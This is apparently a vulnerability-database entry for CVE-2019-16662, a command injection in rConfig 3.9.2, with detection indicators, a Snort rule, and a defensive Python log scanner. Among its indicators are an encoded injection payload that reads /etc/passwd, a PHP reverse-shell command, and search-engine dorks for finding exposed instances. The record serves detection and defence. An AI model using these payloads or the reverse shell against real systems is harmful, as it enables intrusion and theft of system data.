CVE-2019-16662
published 2019-10-28


Priority: P1 · 91 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 97.70% (99.9th percentile)
An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

Affected

1 range
Vendor    Product   Version range   Fixed in
rconfig   rconfig   -               -

Detection & IOCs (extracted from sources)

path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php
url: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
command: ;php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'#
path: /install/
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible rConfig 3.9.2 Remote Code Execution PoC M1 (CVE-2019-16662)"; flow:established,to_server; http.uri.raw; content:"/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b"; nocase; fast_pattern; reference:url,packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html; reference:cve,2019-16662; classtype:attempted-admin; sid:2028933; rev:4; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2019_11_04, cve CVE_2019_16662, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect GET requests to /install/lib/ajaxHandlers/ajaxServerSettingsChk.php with a URL-encoded semicolon (%3b) in the rootUname parameter, indicating command injection attempt.
  • The presence of the /install/ directory on a production rConfig instance is a prerequisite for exploitation; its existence should be treated as a misconfiguration indicator and monitored for access.
  • Successful exploitation response body will contain /etc/passwd content matching 'root:.*:0:0:'; monitor HTTP responses from ajaxServerSettingsChk.php for this pattern.
  • The exploit checks for HTTP 200 on the /install path before proceeding; a 404 indicates the install directory has been removed and the target is not vulnerable.
  • Use Shodan/FOFA/Google dorks to identify exposed rConfig instances: shodan-query 'http.title:"rconfig"', fofa-query 'title="rconfig"', google-query 'intitle:"rconfig"'.
  • The vulnerability is unauthenticated and exploitable only when the /install/ directory remains present post-installation. Removing this directory eliminates the attack surface.
  • The Metasploit module defaults to SSL (RPORT 443); detection rules should cover both HTTP (80) and HTTPS (443) traffic.
  • The Metasploit module bad characters for payload are null byte, newline, carriage return, and ampersand; payloads delivered via rootUname will avoid these characters.
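A defender-side log check for the indicators listed above, added here as an example (not part of this record, the Snort rule, or rConfig itself). It parses constructed Apache-style access-log lines, percent-decodes the rootUname parameter so that %3b is seen as ';', flags shell metacharacters in it, and separately flags a reachable /install/ directory (HTTP 200) as the misconfiguration prerequisite. The log lines, IPs and timestamps are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Nov/2019:10:01:02 +0000] "GET /install/ HTTP/1.1" 200 512 "-" "curl/7.64.0"
203.0.113.7 - - [04/Nov/2019:10:01:03 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 200 1873 "-" "curl/7.64.0"
198.51.100.9 - - [04/Nov/2019:10:05:00 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=admin HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.0.2.5 - - [04/Nov/2019:10:06:00 +0000] "GET /devices.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"
# Shell metacharacters that turn a "username" into an injected command once it reaches exec().
META_RE = re.compile(r'[;|&`\n]|\$\(')


def classify(line):
    """Return (severity, reason) for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path == ENDPOINT:
        # parse_qs percent-decodes values, so the encoded %3b shows up as ';'.
        for value in parse_qs(parts.query).get("rootUname", []):
            if META_RE.search(value):
                return ("critical", f"command injection in rootUname from {m.group('ip')}: {value!r}")
        # Any hit on an install-time handler in production is worth a look even without metacharacters.
        return ("medium", f"access to install-time endpoint from {m.group('ip')}")
    if parts.path.startswith("/install/") and m.group("status") == "200":
        # A served /install/ directory is the prerequisite the exploit checks for first.
        return ("low", f"/install/ directory reachable (HTTP 200) from {m.group('ip')}")
    return None


def scan(log_text):
    """Classify every line; returns a list of (line_no, severity, reason)."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        result = classify(line)
        if result:
            findings.append((no, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for no, sev, reason in scan(SAMPLE_LOG):
        print(f"line {no}: [{sev}] {reason}")
```

Feed real access logs through scan() in place of SAMPLE_LOG; the "medium" tier catches probes that use a different encoding than the Snort rule's literal %3b.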

CVSS provenance

nvd         v3.1   9.8    CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0   10.0   CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck          9.8    CRITICAL